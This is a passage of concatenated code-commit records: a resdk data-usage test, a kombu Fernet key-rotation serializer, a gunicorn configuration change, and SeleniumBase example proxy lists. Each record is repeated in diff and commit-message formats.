}
def test_normal_user(self):
usage_info = self.user_res.data_usage()
self.assertEqual(len(usage_info), 1)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_admin_user(self):
usage_info = self.res.data_usage()
self.assertGreaterEqual(len(usage_info), 2)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_ordering(self):
usage_info = self.res.data_usage(ordering=['full_name', '-data_size'])
self.assertGreaterEqual(len(usage_info), 2)
first = usage_info[0]
second = usage_info[1]
self.assertEqual(first['full_name'], second['full_name'])
self.assertGreaterEqual(first['data_size'], second['data_size'])
| <commit_before># pylint: disable=missing-docstring
from resdk.tests.functional.base import BaseResdkFunctionalTest
class TestDataUsage(BaseResdkFunctionalTest):
expected_fields = {
'user_id',
'username',
'full_name',
'data_size',
'data_size_normalized',
'data_count',
'data_count_normalized',
'sample_count',
'sample_count_normalized',
}
def test_normal_user(self):
usage_info = self.user_res.data_usage()
self.assertEqual(len(usage_info), 1)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_admin_user(self):
usage_info = self.res.data_usage()
self.assertGreaterEqual(len(usage_info), 2)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_ordering(self):
usage_info = self.res.data_usage(ordering=['full_name', '-data_size'])
self.assertGreaterEqual(len(usage_info), 2)
first = usage_info[0]
second = usage_info[1]
self.assertEqual(first['full_name'], second['full_name'])
self.assertGreaterEqual(first['data_size'], second['data_size'])
<commit_msg>Support collection statistics in data usage tests<commit_after> | # pylint: disable=missing-docstring
from resdk.tests.functional.base import BaseResdkFunctionalTest
class TestDataUsage(BaseResdkFunctionalTest):
expected_fields = {
'user_id',
'username',
'full_name',
'data_size',
'data_size_normalized',
'data_count',
'data_count_normalized',
'collection_count',
'collection_count_normalized',
'sample_count',
'sample_count_normalized',
}
def test_normal_user(self):
usage_info = self.user_res.data_usage()
self.assertEqual(len(usage_info), 1)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_admin_user(self):
usage_info = self.res.data_usage()
self.assertGreaterEqual(len(usage_info), 2)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_ordering(self):
usage_info = self.res.data_usage(ordering=['full_name', '-data_size'])
self.assertGreaterEqual(len(usage_info), 2)
first = usage_info[0]
second = usage_info[1]
self.assertEqual(first['full_name'], second['full_name'])
self.assertGreaterEqual(first['data_size'], second['data_size'])
| # pylint: disable=missing-docstring
from resdk.tests.functional.base import BaseResdkFunctionalTest
class TestDataUsage(BaseResdkFunctionalTest):
expected_fields = {
'user_id',
'username',
'full_name',
'data_size',
'data_size_normalized',
'data_count',
'data_count_normalized',
'sample_count',
'sample_count_normalized',
}
def test_normal_user(self):
usage_info = self.user_res.data_usage()
self.assertEqual(len(usage_info), 1)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_admin_user(self):
usage_info = self.res.data_usage()
self.assertGreaterEqual(len(usage_info), 2)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_ordering(self):
usage_info = self.res.data_usage(ordering=['full_name', '-data_size'])
self.assertGreaterEqual(len(usage_info), 2)
first = usage_info[0]
second = usage_info[1]
self.assertEqual(first['full_name'], second['full_name'])
self.assertGreaterEqual(first['data_size'], second['data_size'])
Support collection statistics in data usage tests# pylint: disable=missing-docstring
from resdk.tests.functional.base import BaseResdkFunctionalTest
class TestDataUsage(BaseResdkFunctionalTest):
expected_fields = {
'user_id',
'username',
'full_name',
'data_size',
'data_size_normalized',
'data_count',
'data_count_normalized',
'collection_count',
'collection_count_normalized',
'sample_count',
'sample_count_normalized',
}
def test_normal_user(self):
usage_info = self.user_res.data_usage()
self.assertEqual(len(usage_info), 1)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_admin_user(self):
usage_info = self.res.data_usage()
self.assertGreaterEqual(len(usage_info), 2)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_ordering(self):
usage_info = self.res.data_usage(ordering=['full_name', '-data_size'])
self.assertGreaterEqual(len(usage_info), 2)
first = usage_info[0]
second = usage_info[1]
self.assertEqual(first['full_name'], second['full_name'])
self.assertGreaterEqual(first['data_size'], second['data_size'])
| <commit_before># pylint: disable=missing-docstring
from resdk.tests.functional.base import BaseResdkFunctionalTest
class TestDataUsage(BaseResdkFunctionalTest):
expected_fields = {
'user_id',
'username',
'full_name',
'data_size',
'data_size_normalized',
'data_count',
'data_count_normalized',
'sample_count',
'sample_count_normalized',
}
def test_normal_user(self):
usage_info = self.user_res.data_usage()
self.assertEqual(len(usage_info), 1)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_admin_user(self):
usage_info = self.res.data_usage()
self.assertGreaterEqual(len(usage_info), 2)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_ordering(self):
usage_info = self.res.data_usage(ordering=['full_name', '-data_size'])
self.assertGreaterEqual(len(usage_info), 2)
first = usage_info[0]
second = usage_info[1]
self.assertEqual(first['full_name'], second['full_name'])
self.assertGreaterEqual(first['data_size'], second['data_size'])
<commit_msg>Support collection statistics in data usage tests<commit_after># pylint: disable=missing-docstring
from resdk.tests.functional.base import BaseResdkFunctionalTest
class TestDataUsage(BaseResdkFunctionalTest):
expected_fields = {
'user_id',
'username',
'full_name',
'data_size',
'data_size_normalized',
'data_count',
'data_count_normalized',
'collection_count',
'collection_count_normalized',
'sample_count',
'sample_count_normalized',
}
def test_normal_user(self):
usage_info = self.user_res.data_usage()
self.assertEqual(len(usage_info), 1)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_admin_user(self):
usage_info = self.res.data_usage()
self.assertGreaterEqual(len(usage_info), 2)
self.assertEqual(set(usage_info[0].keys()), self.expected_fields)
def test_ordering(self):
usage_info = self.res.data_usage(ordering=['full_name', '-data_size'])
self.assertGreaterEqual(len(usage_info), 2)
first = usage_info[0]
second = usage_info[1]
self.assertEqual(first['full_name'], second['full_name'])
self.assertGreaterEqual(first['data_size'], second['data_size'])
|
3956293089e500ef1f7d665bc3fcf45706fc5d6b | kombu_fernet/serializers/__init__.py | kombu_fernet/serializers/__init__.py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals, absolute_import
import os
from cryptography.fernet import Fernet, InvalidToken
fernet = Fernet(os.environ['KOMBU_FERNET_KEY'])
def fernet_encode(func):
def inner(message):
return fernet.encrypt(func(message))
return inner
def fernet_decode(func):
def inner(encoded_message):
if isinstance(encoded_message, unicode):
encoded_message = encoded_message.encode('utf-8')
message = fernet.decrypt(encoded_message)
return func(message)
return inner
| # -*- coding: utf-8 -*-
from __future__ import unicode_literals, absolute_import
import os
from cryptography.fernet import Fernet, InvalidToken
fernet = Fernet(os.environ['KOMBU_FERNET_KEY'])
fallback_fernet = None
try:
fallback_fernet = Fernet(os.environ['OLD_KOMBU_FERNET_KEY'])
except KeyError:
pass
def fernet_encode(func):
def inner(message):
return fernet.encrypt(func(message))
return inner
def fernet_decode(func):
def inner(encoded_message):
if isinstance(encoded_message, unicode):
encoded_message = encoded_message.encode('utf-8')
try:
message = fernet.decrypt(encoded_message)
except InvalidToken:
message = fallback_fernet.decrypt(encoded_message)
return func(message)
return inner
| Add ability to in-place rotate fernet key. | Add ability to in-place rotate fernet key.
| Python | mit | heroku/kombu-fernet-serializers | # -*- coding: utf-8 -*-
from __future__ import unicode_literals, absolute_import
import os
from cryptography.fernet import Fernet, InvalidToken
fernet = Fernet(os.environ['KOMBU_FERNET_KEY'])
def fernet_encode(func):
def inner(message):
return fernet.encrypt(func(message))
return inner
def fernet_decode(func):
def inner(encoded_message):
if isinstance(encoded_message, unicode):
encoded_message = encoded_message.encode('utf-8')
message = fernet.decrypt(encoded_message)
return func(message)
return inner
Add ability to in-place rotate fernet key. | # -*- coding: utf-8 -*-
from __future__ import unicode_literals, absolute_import
import os
from cryptography.fernet import Fernet, InvalidToken
fernet = Fernet(os.environ['KOMBU_FERNET_KEY'])
fallback_fernet = None
try:
fallback_fernet = Fernet(os.environ['OLD_KOMBU_FERNET_KEY'])
except KeyError:
pass
def fernet_encode(func):
def inner(message):
return fernet.encrypt(func(message))
return inner
def fernet_decode(func):
def inner(encoded_message):
if isinstance(encoded_message, unicode):
encoded_message = encoded_message.encode('utf-8')
try:
message = fernet.decrypt(encoded_message)
except InvalidToken:
message = fallback_fernet.decrypt(encoded_message)
return func(message)
return inner
| <commit_before># -*- coding: utf-8 -*-
from __future__ import unicode_literals, absolute_import
import os
from cryptography.fernet import Fernet, InvalidToken
fernet = Fernet(os.environ['KOMBU_FERNET_KEY'])
def fernet_encode(func):
def inner(message):
return fernet.encrypt(func(message))
return inner
def fernet_decode(func):
def inner(encoded_message):
if isinstance(encoded_message, unicode):
encoded_message = encoded_message.encode('utf-8')
message = fernet.decrypt(encoded_message)
return func(message)
return inner
<commit_msg>Add ability to in-place rotate fernet key.<commit_after> | # -*- coding: utf-8 -*-
from __future__ import unicode_literals, absolute_import
import os
from cryptography.fernet import Fernet, InvalidToken
fernet = Fernet(os.environ['KOMBU_FERNET_KEY'])
fallback_fernet = None
try:
fallback_fernet = Fernet(os.environ['OLD_KOMBU_FERNET_KEY'])
except KeyError:
pass
def fernet_encode(func):
def inner(message):
return fernet.encrypt(func(message))
return inner
def fernet_decode(func):
def inner(encoded_message):
if isinstance(encoded_message, unicode):
encoded_message = encoded_message.encode('utf-8')
try:
message = fernet.decrypt(encoded_message)
except InvalidToken:
message = fallback_fernet.decrypt(encoded_message)
return func(message)
return inner
| # -*- coding: utf-8 -*-
from __future__ import unicode_literals, absolute_import
import os
from cryptography.fernet import Fernet, InvalidToken
fernet = Fernet(os.environ['KOMBU_FERNET_KEY'])
def fernet_encode(func):
def inner(message):
return fernet.encrypt(func(message))
return inner
def fernet_decode(func):
def inner(encoded_message):
if isinstance(encoded_message, unicode):
encoded_message = encoded_message.encode('utf-8')
message = fernet.decrypt(encoded_message)
return func(message)
return inner
Add ability to in-place rotate fernet key.# -*- coding: utf-8 -*-
from __future__ import unicode_literals, absolute_import
import os
from cryptography.fernet import Fernet, InvalidToken
fernet = Fernet(os.environ['KOMBU_FERNET_KEY'])
fallback_fernet = None
try:
fallback_fernet = Fernet(os.environ['OLD_KOMBU_FERNET_KEY'])
except KeyError:
pass
def fernet_encode(func):
def inner(message):
return fernet.encrypt(func(message))
return inner
def fernet_decode(func):
def inner(encoded_message):
if isinstance(encoded_message, unicode):
encoded_message = encoded_message.encode('utf-8')
try:
message = fernet.decrypt(encoded_message)
except InvalidToken:
message = fallback_fernet.decrypt(encoded_message)
return func(message)
return inner
| <commit_before># -*- coding: utf-8 -*-
from __future__ import unicode_literals, absolute_import
import os
from cryptography.fernet import Fernet, InvalidToken
fernet = Fernet(os.environ['KOMBU_FERNET_KEY'])
def fernet_encode(func):
def inner(message):
return fernet.encrypt(func(message))
return inner
def fernet_decode(func):
def inner(encoded_message):
if isinstance(encoded_message, unicode):
encoded_message = encoded_message.encode('utf-8')
message = fernet.decrypt(encoded_message)
return func(message)
return inner
<commit_msg>Add ability to in-place rotate fernet key.<commit_after># -*- coding: utf-8 -*-
from __future__ import unicode_literals, absolute_import
import os
from cryptography.fernet import Fernet, InvalidToken
fernet = Fernet(os.environ['KOMBU_FERNET_KEY'])
fallback_fernet = None
try:
fallback_fernet = Fernet(os.environ['OLD_KOMBU_FERNET_KEY'])
except KeyError:
pass
def fernet_encode(func):
def inner(message):
return fernet.encrypt(func(message))
return inner
def fernet_decode(func):
def inner(encoded_message):
if isinstance(encoded_message, unicode):
encoded_message = encoded_message.encode('utf-8')
try:
message = fernet.decrypt(encoded_message)
except InvalidToken:
message = fallback_fernet.decrypt(encoded_message)
return func(message)
return inner
|
2dac6ebe5bb2185fead39e28bb805ddb473f8aff | gunicorn_cfg.py | gunicorn_cfg.py | """
This file contains gunicorn settings.
To run sqmpy with gunicorn run the following command:
gunicorn -c gunicorn_cfg.py run:app
In order to daemonize gunicorn add -D flag:
gunicorn -c gunicorn_cfg.py run:app -D
"""
import multiprocessing
# Gunicorn will listen on the given host:port
bind = '0.0.0.0:5000'
# The only tested worker class is gevent
#worker_class = 'gevent'
# Set number of workers based on CPU count
workers = multiprocessing.cpu_count() * 2 + 1
# Uncomment for development
# reload = True
# Daemonize the application
daemon = False
# Comment only for development. Use your own certificates here.
keyfile = 'server.key'
certfile = 'server.crt'
# Application log level
loglevel = 'debug'
| """
This file contains gunicorn settings.
To run sqmpy with gunicorn run the following command:
gunicorn -c gunicorn_cfg.py run:app
In order to daemonize gunicorn add -D flag:
gunicorn -c gunicorn_cfg.py run:app -D
"""
import multiprocessing
# Gunicorn will listen on the given host:port
bind = '0.0.0.0:5000'
# The only tested worker class is gevent
#worker_class = 'gevent'
# Set number of workers based on CPU count
workers = multiprocessing.cpu_count() * 2 + 1
# Uncomment for development
# reload = True
# Daemonize the application
daemon = False
# Comment only for development. Use your own certificates here.
#keyfile = 'server.key'
#certfile = 'server.crt'
# Application log level
loglevel = 'debug'
| Disable SSL for default run | Disable SSL for default run
| Python | bsd-3-clause | simphony/sqmpy,mehdisadeghi/sqmpy,mehdisadeghi/sqmpy,mehdisadeghi/sqmpy,simphony/sqmpy,simphony/sqmpy | """
This file contains gunicorn settings.
To run sqmpy with gunicorn run the following command:
gunicorn -c gunicorn_cfg.py run:app
In order to daemonize gunicorn add -D flag:
gunicorn -c gunicorn_cfg.py run:app -D
"""
import multiprocessing
# Gunicorn will listen on the given host:port
bind = '0.0.0.0:5000'
# The only tested worker class is gevent
#worker_class = 'gevent'
# Set number of workers based on CPU count
workers = multiprocessing.cpu_count() * 2 + 1
# Uncomment for development
# reload = True
# Daemonize the application
daemon = False
# Comment only for development. Use your own certificates here.
keyfile = 'server.key'
certfile = 'server.crt'
# Application log level
loglevel = 'debug'
Disable SSL for default run | """
This file contains gunicorn settings.
To run sqmpy with gunicorn run the following command:
gunicorn -c gunicorn_cfg.py run:app
In order to daemonize gunicorn add -D flag:
gunicorn -c gunicorn_cfg.py run:app -D
"""
import multiprocessing
# Gunicorn will listen on the given host:port
bind = '0.0.0.0:5000'
# The only tested worker class is gevent
#worker_class = 'gevent'
# Set number of workers based on CPU count
workers = multiprocessing.cpu_count() * 2 + 1
# Uncomment for development
# reload = True
# Daemonize the application
daemon = False
# Comment only for development. Use your own certificates here.
#keyfile = 'server.key'
#certfile = 'server.crt'
# Application log level
loglevel = 'debug'
| <commit_before>"""
This file contains gunicorn settings.
To run sqmpy with gunicorn run the following command:
gunicorn -c gunicorn_cfg.py run:app
In order to daemonize gunicorn add -D flag:
gunicorn -c gunicorn_cfg.py run:app -D
"""
import multiprocessing
# Gunicorn will listen on the given host:port
bind = '0.0.0.0:5000'
# The only tested worker class is gevent
#worker_class = 'gevent'
# Set number of workers based on CPU count
workers = multiprocessing.cpu_count() * 2 + 1
# Uncomment for development
# reload = True
# Daemonize the application
daemon = False
# Comment only for development. Use your own certificates here.
keyfile = 'server.key'
certfile = 'server.crt'
# Application log level
loglevel = 'debug'
<commit_msg>Disable SSL for default run<commit_after> | """
This file contains gunicorn settings.
To run sqmpy with gunicorn run the following command:
gunicorn -c gunicorn_cfg.py run:app
In order to daemonize gunicorn add -D flag:
gunicorn -c gunicorn_cfg.py run:app -D
"""
import multiprocessing
# Gunicorn will listen on the given host:port
bind = '0.0.0.0:5000'
# The only tested worker class is gevent
#worker_class = 'gevent'
# Set number of workers based on CPU count
workers = multiprocessing.cpu_count() * 2 + 1
# Uncomment for development
# reload = True
# Daemonize the application
daemon = False
# Comment only for development. Use your own certificates here.
#keyfile = 'server.key'
#certfile = 'server.crt'
# Application log level
loglevel = 'debug'
| """
This file contains gunicorn settings.
To run sqmpy with gunicorn run the following command:
gunicorn -c gunicorn_cfg.py run:app
In order to daemonize gunicorn add -D flag:
gunicorn -c gunicorn_cfg.py run:app -D
"""
import multiprocessing
# Gunicorn will listen on the given host:port
bind = '0.0.0.0:5000'
# The only tested worker class is gevent
#worker_class = 'gevent'
# Set number of workers based on CPU count
workers = multiprocessing.cpu_count() * 2 + 1
# Uncomment for development
# reload = True
# Daemonize the application
daemon = False
# Comment only for development. Use your own certificates here.
keyfile = 'server.key'
certfile = 'server.crt'
# Application log level
loglevel = 'debug'
Disable SSL for default run"""
This file contains gunicorn settings.
To run sqmpy with gunicorn run the following command:
gunicorn -c gunicorn_cfg.py run:app
In order to daemonize gunicorn add -D flag:
gunicorn -c gunicorn_cfg.py run:app -D
"""
import multiprocessing
# Gunicorn will listen on the given host:port
bind = '0.0.0.0:5000'
# The only tested worker class is gevent
#worker_class = 'gevent'
# Set number of workers based on CPU count
workers = multiprocessing.cpu_count() * 2 + 1
# Uncomment for development
# reload = True
# Daemonize the application
daemon = False
# Comment only for development. Use your own certificates here.
#keyfile = 'server.key'
#certfile = 'server.crt'
# Application log level
loglevel = 'debug'
| <commit_before>"""
This file contains gunicorn settings.
To run sqmpy with gunicorn run the following command:
gunicorn -c gunicorn_cfg.py run:app
In order to daemonize gunicorn add -D flag:
gunicorn -c gunicorn_cfg.py run:app -D
"""
import multiprocessing
# Gunicorn will listen on the given host:port
bind = '0.0.0.0:5000'
# The only tested worker class is gevent
#worker_class = 'gevent'
# Set number of workers based on CPU count
workers = multiprocessing.cpu_count() * 2 + 1
# Uncomment for development
# reload = True
# Daemonize the application
daemon = False
# Comment only for development. Use your own certificates here.
keyfile = 'server.key'
certfile = 'server.crt'
# Application log level
loglevel = 'debug'
<commit_msg>Disable SSL for default run<commit_after>"""
This file contains gunicorn settings.
To run sqmpy with gunicorn run the following command:
gunicorn -c gunicorn_cfg.py run:app
In order to daemonize gunicorn add -D flag:
gunicorn -c gunicorn_cfg.py run:app -D
"""
import multiprocessing
# Gunicorn will listen on the given host:port
bind = '0.0.0.0:5000'
# The only tested worker class is gevent
#worker_class = 'gevent'
# Set number of workers based on CPU count
workers = multiprocessing.cpu_count() * 2 + 1
# Uncomment for development
# reload = True
# Daemonize the application
daemon = False
# Comment only for development. Use your own certificates here.
#keyfile = 'server.key'
#certfile = 'server.crt'
# Application log level
loglevel = 'debug'
|
212b5a126e464ff46e60e00846bbb87a2de3fbb2 | seleniumbase/config/proxy_list.py | seleniumbase/config/proxy_list.py | """
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.26.66.140:3128", # (Example) - set your own proxy here
"example2": "64.235.204.107:8080", # (Example) - set your own proxy here
"example3": "82.200.233.4:3128", # (Example) - set your own proxy here
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
| """
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.26.66.140:3128", # (Example) - set your own proxy here
"example2": "64.235.204.107:8080", # (Example) - set your own proxy here
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
| Update the sample proxy list | Update the sample proxy list
| Python | mit | mdmintz/SeleniumBase,seleniumbase/SeleniumBase,seleniumbase/SeleniumBase,seleniumbase/SeleniumBase,mdmintz/SeleniumBase,mdmintz/SeleniumBase,mdmintz/SeleniumBase,seleniumbase/SeleniumBase | """
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.26.66.140:3128", # (Example) - set your own proxy here
"example2": "64.235.204.107:8080", # (Example) - set your own proxy here
"example3": "82.200.233.4:3128", # (Example) - set your own proxy here
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
Update the sample proxy list | """
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.26.66.140:3128", # (Example) - set your own proxy here
"example2": "64.235.204.107:8080", # (Example) - set your own proxy here
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
| <commit_before>"""
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.26.66.140:3128", # (Example) - set your own proxy here
"example2": "64.235.204.107:8080", # (Example) - set your own proxy here
"example3": "82.200.233.4:3128", # (Example) - set your own proxy here
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
<commit_msg>Update the sample proxy list<commit_after> | """
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.26.66.140:3128", # (Example) - set your own proxy here
"example2": "64.235.204.107:8080", # (Example) - set your own proxy here
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
| """
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.26.66.140:3128", # (Example) - set your own proxy here
"example2": "64.235.204.107:8080", # (Example) - set your own proxy here
"example3": "82.200.233.4:3128", # (Example) - set your own proxy here
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
Update the sample proxy list"""
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.26.66.140:3128", # (Example) - set your own proxy here
"example2": "64.235.204.107:8080", # (Example) - set your own proxy here
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
| <commit_before>"""
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.26.66.140:3128", # (Example) - set your own proxy here
"example2": "64.235.204.107:8080", # (Example) - set your own proxy here
"example3": "82.200.233.4:3128", # (Example) - set your own proxy here
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
<commit_msg>Update the sample proxy list<commit_after>"""
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.26.66.140:3128", # (Example) - set your own proxy here
"example2": "64.235.204.107:8080", # (Example) - set your own proxy here
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
|
b0ef175fbf5e71c0dbfa8761b5b01b1bc4ff171d | seleniumbase/config/proxy_list.py | seleniumbase/config/proxy_list.py | """
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.179.12.86:3128", # (Example) - set your own proxy here
"example2": "176.9.79.126:3128", # (Example) - set your own proxy here
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
| """
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
* "ip_address:port" OR "username:password@ip_address:port"
* "server:port" OR "username:password@server:port"
(Do NOT include the http:// or https:// in your proxy string!)
Example proxies in PROXY_LIST below are not guaranteed to be active or secure.
If you don't already have a proxy server to connect to,
you can try finding one from one of following sites:
* https://bit.ly/36GtZa1
* https://www.us-proxy.org/
* https://hidemy.name/en/proxy-list/
* http://free-proxy.cz/en/proxylist/country/all/https/ping/all
"""
PROXY_LIST = {
"example1": "152.179.12.86:3128", # (Example) - set your own proxy here
"example2": "socks4://50.197.210.138:32100", # (Example)
"proxy1": None,
"proxy2": None,
"proxy3": None,
"proxy4": None,
"proxy5": None,
}
| Update the example proxy list | Update the example proxy list
| Python | mit | mdmintz/SeleniumBase,mdmintz/SeleniumBase,seleniumbase/SeleniumBase,seleniumbase/SeleniumBase,mdmintz/SeleniumBase,seleniumbase/SeleniumBase,mdmintz/SeleniumBase,seleniumbase/SeleniumBase | """
Proxy Server "Phone Book".
Simplify running browser tests through a proxy server
by adding your frequently-used proxies here.
Now you can do something like this on the command line:
"pytest SOME_TEST.py --proxy=proxy1"
Format of PROXY_LIST server entries:
